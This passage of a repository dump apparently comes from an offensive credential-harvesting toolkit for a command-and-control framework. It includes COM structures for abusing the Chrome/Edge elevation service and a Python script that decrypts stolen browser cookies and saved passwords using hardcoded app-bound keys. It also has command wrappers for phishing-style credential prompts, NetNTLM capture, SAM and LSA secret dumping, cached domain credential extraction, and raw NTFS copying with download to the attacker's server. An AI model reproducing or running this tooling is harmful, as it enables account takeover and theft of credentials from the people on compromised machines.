} OBJECT_INFORMATION_CLASS, *POBJECT_INFORMATION_CLASS;

typedef struct _OBJECT_NAME_INFORMATION
{
    UNICODE_STRING Name;
} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION;

typedef struct __PACKET_HEADER {
    DWORD magic;
    DWORD type;
    CHAR buffer[256];
    DWORD dwSize;
} PACKET_HEADER;

enum PacketType {
    PACKET_DATA = 1,
    PACKET_FILE = 2,
    PACKET_CMD = 4
};

// https://gist.github.com/snovvcrash/caded55a318bbefcb6cc9ee30e82f824
const CLSID Chrome_CLSID_Elevator = { 0x708860E0, 0xF641, 0x4611, {0x88, 0x95, 0x7D, 0x86, 0x7D, 0xD3, 0x67, 0x5B} };
const IID Chrome_IID_IElevator    = { 0x463ABECF, 0x410D, 0x407F, {0x8A, 0xF5, 0x0D, 0xF3, 0x5A, 0x00, 0x5C, 0xC8} };
const IID Chrome_IID_IElevator2   = { 0x1BF5208B, 0x295F, 0x4992, {0xB5, 0xF4, 0x3A, 0x9B, 0xB6, 0x49, 0x48, 0x38} };
const CLSID Edge_CLSID_Elevator   = { 0x1FCBE96C, 0x1697, 0x43AF, {0x91, 0x40, 0x28, 0x97, 0xC7, 0xC6, 0x97, 0x67} };
const IID Edge_IID_IElevator      = { 0xC9C2B807, 0x7731, 0x4F34, {0x81, 0xB7, 0x44, 0xFF, 0x77, 0x79, 0x52, 0x2B} };

typedef enum {
    PROTECTION_NONE = 0,
    PROTECTION_PATH_VALIDATION_OLD = 1,
    PROTECTION_PATH_VALIDATION = 2,
    PROTECTION_MAX = 3
} ProtectionLevel;

// oleview used to extract structures
// note how edge required 3 additional functions in the structure

typedef struct IElevatorEdge IElevatorEdge;

typedef struct IElevatorEdgeVtbl
    {
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            IElevatorEdge * This,
            /* [in] */ REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            IElevatorEdge * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            IElevatorEdge * This);

        HRESULT ( STDMETHODCALLTYPE *ReservedFunction1 )( 
            IElevatorEdge * This);
        
        HRESULT ( STDMETHODCALLTYPE *LaunchUpdateCmdElevated )( 
            IElevatorEdge * This,
            /* [in] */ LPWSTR browser_appid, 
            /* [in] */ LPWSTR cmd_id, 
            /* [in] */ unsigned long caller_proc_id, 
            /* [out] */ ULONG_PTR* proc_handle);

        HRESULT ( STDMETHODCALLTYPE *LaunchUpdateCmdElevatedAndWait )( 
            IElevatorEdge * This,
            /* [in] */ LPWSTR browser_appid, 
            /* [in] */ LPWSTR cmd_id, 
            /* [in] */ unsigned long wait_timeout, 
            /* [out] */ unsigned long* exit_code);

        HRESULT ( STDMETHODCALLTYPE *RunRecoveryCRXElevated )( 
            IElevatorEdge * This,
            /* [string][in] */ WCHAR *crx_path,
            /* [string][in] */ WCHAR *browser_appid,
            /* [string][in] */ WCHAR *browser_version,
            /* [string][in] */ WCHAR *session_id,
            /* [in] */ unsigned long caller_proc_id,
            /* [out] */ ULONG_PTR *proc_handle);
        
        HRESULT ( STDMETHODCALLTYPE *EncryptData )( 
            IElevatorEdge * This,
            /* [in] */ ProtectionLevel protection_level,
            /* [in] */  BSTR plaintext,
            /* [out] */ BSTR *ciphertext,
            /* [out] */ unsigned long *last_error);
        
        HRESULT ( STDMETHODCALLTYPE *DecryptData )( 
            IElevatorEdge * This,
            /* [in] */  BSTR ciphertext,
            /* [out] */ BSTR *plaintext,
            /* [out] */ unsigned long *last_error);
        
        HRESULT ( STDMETHODCALLTYPE *InstallVPNServices )( 
            IElevatorEdge * This);
        
    } IElevatorEdgeVtbl;
 
    struct IElevatorEdge
    {
        struct IElevatorEdgeVtbl *lpVtbl;
    };

typedef struct IElevatorChrome IElevatorChrome;

typedef struct IElevatorChromeVtbl
    {
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            IElevatorChrome * This,
            /* [in] */ REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            IElevatorChrome * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            IElevatorChrome * This);

        HRESULT ( STDMETHODCALLTYPE *RunRecoveryCRXElevated )( 
            IElevatorChrome * This,
            /* [string][in] */ WCHAR *crx_path,
            /* [string][in] */ WCHAR *browser_appid,
            /* [string][in] */ WCHAR *browser_version,
            /* [string][in] */ WCHAR *session_id,
            /* [in] */ unsigned long caller_proc_id,
            /* [out] */ ULONG_PTR *proc_handle);
        
        HRESULT ( STDMETHODCALLTYPE *EncryptData )( 
            IElevatorChrome * This,
            /* [in] */ ProtectionLevel protection_level,
            /* [in] */  BSTR plaintext,
            /* [out] */ BSTR *ciphertext,
            /* [out] */ unsigned long *last_error);
        
        HRESULT ( STDMETHODCALLTYPE *DecryptData )( 
            IElevatorChrome * This,
            /* [in] */  BSTR ciphertext,
            /* [out] */ BSTR *plaintext,
            /* [out] */ unsigned long *last_error);
        
        HRESULT ( STDMETHODCALLTYPE *InstallVPNServices )( 
            IElevatorChrome * This);
        
    } IElevatorChromeVtbl;
 
    struct IElevatorChrome
    {
        struct IElevatorChromeVtbl *lpVtbl;
    };

    // Buffer to store decryption key and length
    typedef struct {
        unsigned char* data;
        size_t len;
    } Buffer;

================================================
FILE: Creds-BOF/cookie-monster/cookie-monster.axs
================================================

var cmd_cookie_monster = ax.create_command("cookie-monster", "Locate and copy the cookie file used for Edge/Chrome/Firefox", "cookie-monster [ -b [chrome || msedge || firefox] [--cookie-only || --key-only || --password-only] [pid] ] or [--profile <Local State File Path> <PID>]");
cmd_cookie_monster.addArgFlagString( "-b", "browser",        "Extract data from 'chrome', 'msedge', 'firefox' or 'all'", "");
cmd_cookie_monster.addArgFlagString( "--profile", "profile", "Extract from custom browser profile path as system", "");
cmd_cookie_monster.addArgBool(       "--cookie-only",        "Only retrieve the Cookie file. Do not attempt to download Login Data file or retrieve app bound encryption key.");
cmd_cookie_monster.addArgBool(       "--password-only",      "Only retrieve the Login Data file. Do not attempt to download Cookie file or retrieve app bound encryption key.");
cmd_cookie_monster.addArgBool(       "--key-only",           "Only retrieve the app bound encryption key. Do not attempt to download the Cookie or Login Data files.");
cmd_cookie_monster.addArgInt(        "pid",                  "Browser PID", 0);
cmd_cookie_monster.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)
{
    let browser = parsed_json["browser"];
    let profile = parsed_json["profile"];
    let pid     = parsed_json["pid"];

    let browserPid    = 0;
    let cookiePid     = 0;
    let passwordPid   = 0;
    let dumpCookie    = 0;
    let dumpPassword = 0;
    let dumpKey = 0;

    if(parsed_json["--key-only"]) {
        dumpKey = 1;
    }
    if(parsed_json["--cookie-only"]) {
        dumpCookie = 1;
        cookiePid = pid;
    }
    if(parsed_json["--password-only"]) {
        dumpPassword = 1;
        passwordPid = pid;
    }

    if(browser.length == 0 && profile.length == 0) { throw new Error("Use '-b <browser>' or '--profile <Local State path>'"); }

    if(browser.length > 0 && profile.length > 0) { throw new Error("'-b' cannot be used with '--profile'"); }

    if( profile.length > 0 ) {
        if( pid == 0 ) { throw new Error("For profile need browser PID"); }
        browserPid = pid;
    } else {
        if( browser != "chrome" && browser != "msedge" && browser != "firefox" && browser != "all") { throw new Error("Extract data from 'chrome', 'msedge', 'firefox' or 'all' only !"); }
    }
    if( browser == "all" ) browser = "";

    if( (dumpKey && dumpCookie) || (dumpKey && dumpPassword) || (dumpPassword && dumpCookie) ) { throw new Error("--key-only cannot be used with --cookie-only or --passwords-only"); }

    let bof_path = ax.script_dir() + "_bin/cookie-monster-bof." + ax.arch(id) + ".o";
    let bof_params = ax.bof_pack("cstr,cstr,int,int,int,int,int,int", [ browser, profile, browserPid, dumpCookie, dumpPassword, dumpKey, cookiePid, passwordPid]);
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Running Cookie-Monster BOF");
});


================================================
FILE: Creds-BOF/cookie-monster/decrypt.py
================================================
import sys
import base64
import sqlite3
import os
import argparse
from Crypto.Cipher import AES, ChaCha20_Poly1305
import binascii
import json
from datetime import datetime, timedelta
from pyasn1.codec.der import decoder

def cookies(key, file_location):
    if os.path.isfile(file_location) == False:
        print("Error: File does not exist")
        sys.exit(1)
    try:
        conn = sqlite3.connect(file_location)
        cursor = conn.cursor()
        cursor.execute('select host_key, "TRUE", path, "FALSE", expires_utc, has_expires, name, CAST(encrypted_value AS BLOB) from cookies')
        values = cursor.fetchall()
        for host_key, _, path, _, expires_utc, has_expires, name, encrypted_value in values:
            print("Host: " + host_key)
            print("Path: " + path)
            print("Name: " + name)
            print("Cookie: " + decrypt_data(encrypted_value,key, False) + ";")
            print("Expires: " + (datetime(1601, 1, 1) + timedelta(microseconds=expires_utc)).strftime('%b %d %Y %H:%M:%S')) if has_expires else -1
            print("")
    except sqlite3.Error as e:
        print("Error: Could not connect to database")
        print(e)
        sys.exit(1)

def cookies_for_editor(key, file_location):
    cookies = []
    if os.path.isfile(file_location) == False:
        print("Error: File does not exist")
        sys.exit(1)
    try:
        conn = sqlite3.connect(file_location)
        cursor = conn.cursor()
        cursor.execute('select host_key, "TRUE", path, "FALSE", expires_utc, has_expires, name, CAST(encrypted_value AS BLOB) from cookies')
        values = cursor.fetchall()
        for host_key, _, path, _, expires_utc, has_expires, name, encrypted_value in values:
            decrypted_value = decrypt_data(encrypted_value, key, False)
            expiration_date = (datetime(1601, 1, 1) + timedelta(microseconds=expires_utc)).timestamp() if has_expires else -1
            cookie = {
                "domain": host_key,
                "expirationDate": expiration_date,
                "hostOnly": not host_key.startswith('.'),
                "httpOnly": False,
                "name": name,
                "path": path,
                "sameSite": None,
                "secure": False,
                "session": False,
                "storeId": None,
                "value": decrypted_value
            }
            cookies.append(cookie)
        cookie_file_name = datetime.now().strftime("%Y-%m-%d_%H-%M-%S") + "_cookies.json"
        with open(cookie_file_name, 'w') as f:
            json.dump(cookies, f, indent=4)
        print("Cookies saved to " + cookie_file_name)
    except sqlite3.Error as e:
        print("Error: Could not connect to database")
        print(e)
        sys.exit(1)

def login_data(key, file_location):
    if os.path.isfile(file_location) == False:
        print("Error: File does not exist")
        sys.exit(1)
    try:
        conn = sqlite3.connect(file_location)
        cursor = conn.cursor()
        cursor.execute("SELECT origin_url, username_value, password_value FROM logins")
        values = cursor.fetchall()
        for origin_url, username_value, password_value in values:
            print("URL: " + origin_url)
            print("Username: " + username_value)
            print("Password: " + decrypt_data(password_value, key, True))
            print("")
    except sqlite3.Error as e:
        print("Error: Could not connect to database")
        print(e)
        sys.exit(1)

def cookies_for_cuddlephish(key, file_location):
    cookies = []
    if os.path.isfile(file_location) == False:
        print("Error: File does not exist")
        sys.exit(1)
    try:
        priority_map = {1: "Medium", 2: "High"}
        conn = sqlite3.connect(file_location)
        cursor = conn.cursor()
        cursor.execute('select creation_utc, host_key, top_frame_site_key, name, CAST(encrypted_value AS BLOB), path, expires_utc, is_secure, is_httponly, last_access_utc, has_expires, is_persistent, priority, samesite, source_scheme, source_port, last_update_utc, source_type, has_cross_site_ancestor from cookies')
        values = cursor.fetchall()

        for creation_utc, host_key, top_frame_site_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly, last_access_utc, has_expires, is_persistent, priority, samesite, source_scheme, source_port, last_update_utc, source_type, has_cross_site_ancestor in values:
            decrypted_value = decrypt_data(encrypted_value, key)
            expiration_date = (datetime(1601, 1, 1) + timedelta(microseconds=expires_utc)).timestamp() if has_expires else -1

            samesite_map = {0: "None", 1: "Lax", 2: "Strict"}

            source_scheme_map = {0: "NonSecure", 1: "Secure"}

            cookie = {
                'domain': host_key,
                'expires': expiration_date,
                'httpOnly': bool(is_httponly),
                'name': name,
                'path': path,
                'priority': priority_map.get(priority, "Medium"),
                'sameParty': False,
                'sameSite': samesite_map.get(samesite, "None"),
                'secure': bool(is_secure),
                'session': not bool(is_persistent),
                'size': len(name) + len(decrypted_value),
                'sourcePort': source_port,
                'value': decrypted_value
            }
            cookies.append(cookie)

        output = {
            "url": "about:blank",
            "cookies": cookies,
            "local_storage": []
        }
        cookie_file_name = "cuddlephish_" +datetime.now().strftime("%Y-%m-%d_%H-%M-%S") + ".json"
        with open(cookie_file_name, 'w') as f:
            json.dump(output, f, indent=4)
        print("Cookies saved to " + cookie_file_name)
    except sqlite3.Error as e:
        print("Error: Could not connect to database")
        print(e)
        sys.exit(1)

def decrypt_data(encrypted_junk, key, password=False):
    #key = binascii.unhexlify(key)
    version = encrypted_junk[:3]
    if version in (b'v10', b'v11'):
        try:
            if password:
                initialisation_vector = encrypted_junk[3:15]
                encrypted_password = encrypted_junk[15:-16]
                cipher = AES.new(key, AES.MODE_GCM, initialisation_vector)
                decrypted_pass = cipher.decrypt(encrypted_password)
                decrypted_pass = decrypted_pass.decode('utf-8', errors='replace')
                return decrypted_pass
            nonce = encrypted_junk[3:3 + 12]
            if len(nonce) == 0:
                print("Error: Nonce cannot be empty")
                return ""
            cipher_text = encrypted_junk[3+12:-16]
            tag = encrypted_junk[-16:]
            plain_text = AES.new(key, AES.MODE_GCM, nonce)
            text = plain_text.decrypt(cipher_text)
            return text[32:].decode('utf-8', errors='replace')
        except Exception as e:
            print("Error: Could not decrypt password")
            print(e)
            return ""
    if version in (b'v20'):
        try:
            nonce = encrypted_junk[3:3 + 12]
            if len(nonce) == 0:
                print("Error: Nonce cannot be empty")
                return ""
            cipher_text = encrypted_junk[3+12:-16]
            tag = encrypted_junk[-16:]
            plain_text = AES.new(key, AES.MODE_GCM, nonce)
            text = plain_text.decrypt(cipher_text)
            if password:
                return text.decode('utf-8', errors='replace')
            else:
                return text[32:].decode('utf-8', errors='replace')
        except Exception as e:
            print("Error: Could not decrypt password")
            print(e)
            return ""

def byte_xor(ba1, ba2):
    return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])

def argparse_args():
    parser = argparse.ArgumentParser(description='Decrypt Chromium cookies and passwords given a key and DB file')
    parser.add_argument('-k', '--key', help='Decryption key', required=True)
    parser.add_argument('-o','--option', choices=['cookies', 'passwords', 'cookie-editor', 'cuddlephish', 'firefox'], help='Option to choose', required=True)
    parser.add_argument('-f','--file', help='Location of the database file', required=True)
    parser.add_argument('--chrome-aes-key',help='Chrome AES Key',required=False)
    parser.add_argument('--chrome-v10',action="store_false",help='Chrome v10',required=False)
    return parser.parse_args()

def main():
    args = argparse_args()
    key = args.key
    base64_key = base64.b64encode(key.encode())
    option = args.option
    file_location = args.file
    chromeAES = args.chrome_aes_key
    chrome_v10 = args.chrome_v10
    if chromeAES:
        base64ChromeKey = base64.b64encode(chromeAES.encode())

    key = bytearray(base64.b64decode(base64_key).decode('utf-8').replace('\\x', ''), 'utf-8')
    # if key len is not 32, then its chrome 127+
    # https://github.com/runassu/chrome_v20_decryption/issues/14#issuecomment-2708796234
    key = binascii.unhexlify(key)

    if (chromeAES):
        chromeKey = bytearray(base64.b64decode(base64ChromeKey).decode('utf-8').replace('\\x', ''), 'utf-8')
        chromeKey = binascii.unhexlify(chromeKey)

        xor_key = bytes.fromhex("CCF8A1CEC56605B8517552BA1A2D061C03A29E90274FB2FCF59BA4B75C392390")
        xored_aes_key = byte_xor(chromeKey, xor_key)

    #print(len(key))
    if not chrome_v10:
        if len(key) > 32:
            aes_key = binascii.a2b_base64("sxxuJBrIRnKNqcH6xJNmUc/7lE0UOrgWJ2vMbaAoR4c=")
            chacha20_key = bytes.fromhex("E98F37D7F4E1FA433D19304DC2258042090E2D1D7EEA7670D41F738D08729660")
            flag = key[0]
            iv = key[1:1+12]
            ciphertext = key[1+12:1+12+32]
            tag = key[1+12+32:]

            #check for flag to determine if AES or ChaCha. Changed in chrome 130+
            if flag == 1:
                cipher = AES.new(aes_key, AES.MODE_GCM, nonce=iv)
            elif flag == 2:
                cipher = ChaCha20_Poly1305.new(key=chacha20_key, nonce=iv)
            elif flag == 3:
                iv = key[1+32:1+32+12]
                ciphertext = key[1+32+12:1+32+12+32]
                tag = key[1+32+12+32:1+32+12+32+16]
                cipher = AES.new(xored_aes_key, AES.MODE_GCM, nonce=iv)
            else:
                raise ValueError(f"Unsupported flag: {flag}")
            key = cipher.decrypt_and_verify(ciphertext, tag)
            print("Decrypted App Bound Key: " + ''.join(f'\\x{b:02X}' for b in key) + "\n")

    if option == "cookies":
        cookies(key, file_location)
    elif option == "passwords":
        login_data(key, file_location)
    elif option == "cookie-editor":
        cookies_for_editor(key, file_location)
    elif option == "cuddlephish":
        cookies_for_cuddlephish(key, file_location)
    elif option == "firefox":
        print("TO DO")
    else:
        print("Error: Invalid option")
        sys.exit(1)

if __name__ == "__main__":
    main()

================================================
FILE: Creds-BOF/cookie-monster/requirements.txt
================================================
pycryptodome
pyasn1_modules

================================================
FILE: Creds-BOF/creds.axs
================================================
var metadata = {
    name: "Creds-BOF",
    description: "BOF tools that can be used to harvest passwords"
};

ax.script_import(ax.script_dir() + "nanodump/nanodump.axs")
ax.script_import(ax.script_dir() + "cookie-monster/cookie-monster.axs")

/// COMMANDS

var cmd_askcreds = ax.create_command("askcreds", "Prompt for credentials", "askcreds -p \"Windows Update\"");
cmd_askcreds.addArgBool("--async", "Use Async BOF");
cmd_askcreds.addArgFlagString("-p", "prompt",    "", "Restore Network Connection");
cmd_askcreds.addArgFlagString("-n", "note",      "", "Please verify your Windows user credentials to proceed");
cmd_askcreds.addArgFlagInt(   "-t", "wait_time", "", 30);
cmd_askcreds.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let prompt    = parsed_json["prompt"];
    let note      = parsed_json["note"];
    let wait_time = parsed_json["wait_time"];
    let async = "";
    if (parsed_json["--async"]) async = "-a ";


    let bof_params = ax.bof_pack("wstr,wstr,int", [prompt, note, wait_time]);
    let bof_path = ax.script_dir() + "_bin/askcreds." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof ${async}"${bof_path}" ${bof_params}`, "BOF implementation: askcreds");
});



var cmd_get_ntlm = ax.create_command("get-netntlm", "Retrieve NetNTLM hash for the current user", "get-netntlm --no-ess");
cmd_get_ntlm.addArgBool( "--no-ess", "The option can be utilized and if you would like the attempt to disable session security in NetNTLMv1");
cmd_get_ntlm.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let no_ess = 0;
    if(parsed_json["--no-ess"]) { no_ess = 1; }

    let bof_params = ax.bof_pack("int", [no_ess]);
    let bof_path = ax.script_dir() + "_bin/get-netntlm." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "BOF implementation: Internal Monologue");
});



var cmd_hashdump = ax.create_command("hashdump", "Dump SAM hashes", "hashdump");
cmd_hashdump.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let hook = function (task)
    {
        let agent = ax.agents()[task.agent];
        let computer = agent["computer"];
        let address = agent["internal_ip"];

        let match;
        let regex = /^([a-zA-Z0-9_\-]+):\d+:([a-fA-F0-9]{32})$/gm;
        while ((match = regex.exec(task.text)) !== null) {
            ax.credentials_add(match[1], match[2], "", "ntlm", "", "SAM", `${computer} (${address})`);
        }

        return task;
    }
    let bof_path = ax.script_dir() + "_bin/hashdump." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "BOF implementation: hashdump", hook);
});



var cmd_lsadump_secrets = ax.create_command("lsadump_secrets", "Dump LSA secrets from SECURITY hive (requires SYSTEM)", "lsadump_secrets");
cmd_lsadump_secrets.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let accumulatedText = "";
    let processedSecrets = new Set();

    let hook = function (task) {
        let agent = ax.agents()[task.agent];
        let computer = agent["computer"];
        let address = agent["internal_ip"];

        if (task.text) {
            accumulatedText += task.text;
        }

        // Match service secrets with format:
        // Secret  : _SC_<ServiceName>
        //  / service '<ServiceName>' with username : <username>
        // cur/text: <password>
        // or
        // old/text: <password>
        let fullText = accumulatedText;
        let lines = fullText.split(/\r?\n/);

        let currentSecret = null;
        let currentService = null;
        let currentUsername = null;
        let secretsFound = 0;
        let credentialsAdded = 0;

        for (let i = 0; i < lines.length; i++) {
            let line = lines[i];

            let secretMatch = line.match(/Secret\s+:\s+_SC_(.+)/);
            if (secretMatch) {
                secretsFound++;
                let secretName = secretMatch[1].trim();

                if (currentSecret && currentService && currentUsername) {
                    for (let j = currentSecret.lineIndex + 1; j < lines.length; j++) {
                        let pwdLine = lines[j];

                        if (pwdLine.match(/Secret\s+:/)) break;

                        let curMatch = pwdLine.match(/cur\/text:\s+(.+)/);
                        if (curMatch) {
                            let password = curMatch[1].trim();
                            if (password && password.length > 0 && !password.includes("Cached domain credentials key")) {
                                let domain = "";
                                let user = currentUsername;
                                if (currentUsername.includes("\\")) {
                                    let parts = currentUsername.split("\\");
                                    domain = parts[0];
                                    user = parts.slice(1).join("\\");
                                }
                                let credKey = `${currentService}:${user}:${password}:cur`;
                                if (!processedSecrets.has(credKey)) {
                                    processedSecrets.add(credKey);
                                    let tag = domain ? `${domain} / ${currentService}` : currentService;
                                    ax.credentials_add(user, password, "", "plaintext", tag, "LSA Secret", `${computer} (${address})`);
                                    credentialsAdded++;
                                }
                            }
                        }

                        let oldMatch = pwdLine.match(/old\/text:\s+(.+)/);
                        if (oldMatch) {
                            let password = oldMatch[1].trim();
                            if (password && password.length > 0 && !password.includes("Cached domain credentials key")) {
                                let domain = "";
                                let user = currentUsername;
                                if (currentUsername.includes("\\")) {
                                    let parts = currentUsername.split("\\");
                                    domain = parts[0];
                                    user = parts.slice(1).join("\\");
                                }
                                let credKey = `${currentService}:${user}:${password}:old`;
                                if (!processedSecrets.has(credKey)) {
                                    processedSecrets.add(credKey);
                                    let tag = domain ? `${domain} / ${currentService}` : currentService;
                                    ax.credentials_add(user, password, "", "plaintext", tag, "LSA Secret (old)", `${computer} (${address})`);
                                    credentialsAdded++;
                                }
                            }
                        }
                    }
                }

                currentSecret = {name: secretName, lineIndex: i};
                currentService = null;
                currentUsername = null;
                continue;
            }

            if (currentSecret) {
                let serviceMatch = line.match(/service\s+'([^']+)'\s+with\s+username\s+:\s+(.+)/);
                if (serviceMatch) {
                    currentService = serviceMatch[1];
                    currentUsername = serviceMatch[2].trim();
                }
            }
        }

        if (currentSecret && currentService && currentUsername) {
            for (let j = currentSecret.lineIndex + 1; j < lines.length; j++) {
                let pwdLine = lines[j];

                if (pwdLine.match(/Secret\s+:/)) break;

                let curMatch = pwdLine.match(/cur\/text:\s+(.+)/);
                if (curMatch) {
                    let password = curMatch[1].trim();
                    if (password && password.length > 0 && !password.includes("Cached domain credentials key")) {
                        let domain = "";
                        let user = currentUsername;
                        if (currentUsername.includes("\\")) {
                            let parts = currentUsername.split("\\");
                            domain = parts[0];
                            user = parts.slice(1).join("\\");
                        }
                        let credKey = `${currentService}:${user}:${password}:cur`;
                        if (!processedSecrets.has(credKey)) {
                            processedSecrets.add(credKey);
                            let tag = domain ? `${domain} / ${currentService}` : currentService;
                            ax.credentials_add(user, password, "", "plaintext", tag, "LSA Secret", `${computer} (${address})`);
                            credentialsAdded++;
                        }
                    }
                }

                let oldMatch = pwdLine.match(/old\/text:\s+(.+)/);
                if (oldMatch) {
                    let password = oldMatch[1].trim();
                    if (password && password.length > 0 && !password.includes("Cached domain credentials key")) {
                        let domain = "";
                        let user = currentUsername;
                        if (currentUsername.includes("\\")) {
                            let parts = currentUsername.split("\\");
                            domain = parts[0];
                            user = parts.slice(1).join("\\");
                        }
                        let credKey = `${currentService}:${user}:${password}:old`;
                        if (!processedSecrets.has(credKey)) {
                            processedSecrets.add(credKey);
                            let tag = domain ? `${domain} / ${currentService}` : currentService;
                            ax.credentials_add(user, password, "", "plaintext", tag, "LSA Secret (old)", `${computer} (${address})`);
                            credentialsAdded++;
                        }
                    }
                }
            }
        }

        return task;
    }
    let bof_path = ax.script_dir() + "_bin/lsadump_secrets." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "BOF: lsadump::secrets", hook);
});


var cmd_lsadump_sam = ax.create_command("lsadump_sam", "Dump SAM hashes (requires admin)", "lsadump_sam");
cmd_lsadump_sam.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let hook = function (task) {
        let agent = ax.agents()[task.agent];
        let computer = agent["computer"];
        let address = agent["internal_ip"];

        let match;
        let regex = /^([a-zA-Z0-9_\-]+):(\d+):([a-fA-F0-9]{32})$/gm;
        while ((match = regex.exec(task.text)) !== null) {
            ax.credentials_add(match[1], match[3], "", "ntlm", "", "SAM", `${computer} (${address})`);
        }
        return task;
    }
    let bof_path = ax.script_dir() + "_bin/lsadump_sam." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "BOF: lsadump::sam", hook);
});


var cmd_lsadump_cache = ax.create_command("lsadump_cache", "Dump cached domain credentials (DCC2/MSCacheV2, requires SYSTEM)", "lsadump_cache");
cmd_lsadump_cache.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let hook = function (task) {
        let agent = ax.agents()[task.agent];
        let computer = agent["computer"];
        let address = agent["internal_ip"];

        let match;
        // Match: MsCacheV2 : <hash>
        let regex = /User\s+:\s+([^\\\n]+)\\([^\n]+)\nMsCacheV2\s+:\s+([a-fA-F0-9]{32})/gm;
        while ((match = regex.exec(task.text)) !== null) {
            let domain = match[1];
            let username = match[2];
            let hash = match[3];
            ax.credentials_add(username, hash, "", "dcc2", domain, "DCC2", `${computer} (${address})`);
        }
        return task;
    }
    let bof_path = ax.script_dir() + "_bin/lsadump_cache." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "BOF: lsadump::cache", hook);
});



var cmd_underlaycopy = ax.create_command("underlaycopy", "Copy file using low-level NTFS access (MFT or Metadata mode)", "underlaycopy MFT C:\\Windows\\System32\\notepad.exe -w C:\\temp\\notepad_copy.exe");
cmd_underlaycopy.addArgString("mode", true, "Copy mode: MFT or Metadata");
cmd_underlaycopy.addArgString("source", true, "Source file path");
cmd_underlaycopy.addArgFlagString("-w", "destination", "Destination file path (required if --download is not used)", "");
cmd_underlaycopy.addArgBool("--download", "Download file to server instead of saving to disk");
cmd_underlaycopy.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let mode = parsed_json["mode"];
    let source = parsed_json["source"];
    let dest = parsed_json["destination"] || "";
    let download = parsed_json["--download"] ? 1 : 0;
    if (mode !== "MFT" && mode !== "Metadata") {
        ax.console_message(id, "Error: Mode must be 'MFT' or 'Metadata'", "error");
        return;
    }
    // If destination starts with '--', it's likely a flag, not a destination path
    if (dest && dest.startsWith("--")) {
        dest = "";
    }

    if (!download && !dest) {
        ax.console_message(id, "Error: Either destination path or --download option must be provided", "error");
        return;
    }

    // Always pass destination (empty string if not provided)
    // The order matters: mode, source, dest, download
    let bof_params = ax.bof_pack("cstr,cstr,cstr,int", [mode, source, dest || "", download]);
    let bof_path = ax.script_dir() + "_bin/underlaycopy." + ax.arch(id) + ".o";

    let task_desc = download ? "Task: UnderlayCopy file copy and download to server" : "Task: UnderlayCopy file copy";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, task_desc);
});



var group_test = ax.create_commands_group("Creds-BOF", [
    cmd_askcreds, cmd_get_ntlm, cmd_hashdump, cmd_cookie_monster,
    cmd_nanodump, cmd_nanodump_ppl_dump, cmd_nanodump_ppl_medic, cmd_nanodump_ssp, cmd_underlaycopy,
    cmd_lsadump_secrets, cmd_lsadump_sam, cmd_lsadump_cache
]);
ax.register_commands_group(group_test, ["beacon", "gopher", "kharon"], ["windows"], []);



/// MENU

let hashdump_access_action = menu.create_action("SAM hashdump", function(agents_id) { agents_id.forEach(id => ax.execute_command(id, "hashdump")) });
menu.add_session_access(hashdump_access_action, ["beacon", "gopher", "kharon"], ["windows"]);

================================================
FILE: Creds-BOF/get-netntlm/get-netntlm.c
================================================
#define SECURITY_WIN32
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <security.h>
#include <stdint.h>
#include "beacon.h"

WINBASEAPI void __cdecl MSVCRT$free(void *_Memory);
WINBASEAPI size_t __cdecl MSVCRT$strlen(const char *_Str);
WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T);
WINBASEAPI _CRTIMP int __cdecl MSVCRT$sscanf_s(const char *_Src,const char *_Format,...);
WINBASEAPI int __cdecl MSVCRT$sprintf(char *__stream, const char *__format, ...);
WINBASEAPI void *__cdecl MSVCRT$calloc(size_t _NumOfElements, size_t _SizeOfElements);
WINBASEAPI void *__cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount);
WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
DECLSPEC_IMPORT SECURITY_STATUS WINAPI SECUR32$AcquireCredentialsHandleA(LPCTSTR, LPCTSTR, ULONG, PLUID, PVOID, SEC_GET_KEY_FN, PVOID, PCredHandle, PTimeStamp);
DECLSPEC_IMPORT SECURITY_STATUS WINAPI SECUR32$InitializeSecurityContextA(PCredHandle, PCtxtHandle, SEC_CHAR *, ULONG, ULONG, ULONG, PSecBufferDesc, ULONG, PCtxtHandle, PSecBufferDesc, PULONG, PTimeStamp);
WINBASEAPI SECURITY_STATUS WINAPI SECUR32$AcceptSecurityContext( PCredHandle phCredential, PCtxtHandle phContext, PSecBufferDesc pInput, ULONG fContextReq, ULONG TargetDataRep, PCtxtHandle phNewContext, PSecBufferDesc pOutput, ULONG *pfContextAttr, PTimeStamp ptsExpiry );
